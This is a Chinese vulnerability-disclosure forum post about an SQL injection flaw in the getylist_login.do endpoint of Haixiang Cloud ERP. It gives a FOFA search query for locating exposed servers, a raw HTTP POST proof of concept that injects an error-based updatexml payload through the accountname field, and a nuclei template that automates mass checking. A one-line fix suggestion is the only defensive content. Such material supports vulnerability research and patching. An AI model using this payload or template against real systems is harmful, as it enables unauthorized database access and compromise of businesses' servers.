海翔云ERP getylist_login 接口SQL注入漏洞

我是大白   ·   发表于 2024-03-08 13:24:58   ·   漏洞文章

海翔云ERP getylist_login 接口SQL注入漏洞

漏洞描述

海翔云ERP,由成都海翔软件有限公司自主研发,拥有完全知识产权。 云ERP为企业提供 营销 + 财务 + 仓储 + 物流 整体解决方案;云ERP致力于在互联网背景下,为商贸公司提供企业级整体应用解决方案。

海翔云ERP getylist_login 接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终导致服务器失陷。

产品界面

fofa语法

body="checkMacWaitingSecond"

POC

  1. POST /getylist_login.do HTTP/1.1
  2. Host:
  3. Content-Type: application/x-www-form-urlencoded
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  5. Content-Length: 0
  6. accountname=test' and (updatexml(1,concat(0x7e,(select md5(123456)),0x7e),1));--

nuclei验证

  1. id: HaiXiangYun-ERP-getylist-login-SQL
  2. info:
  3. name: 海翔云ERP getylist_login 接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终导致服务器失陷。
  4. author: nobody
  5. severity: high
  6. metadata:
  7. fofa-query: body="checkMacWaitingSecond"
  8. http:
  9. - raw:
  10. - |
  11. POST /getylist_login.do HTTP/1.1
  12. Host:{{Hostname}}
  13. Content-Type: application/x-www-form-urlencoded
  14. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  15. Content-Length: 0
  16. accountname=test' and (updatexml(1,concat(0x7e,(select md5(123456)),0x7e),1));--
  17. matchers:
  18. - type: dsl
  19. dsl:
  20. - contains_all(body,"e10adc3949ba59abbe56e057f20f883")

修复建议

  • 设置安全访问策略,过滤常见字符

打赏我,让我更有动力~

0 条回复   |  直到 8个月前 | 340 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.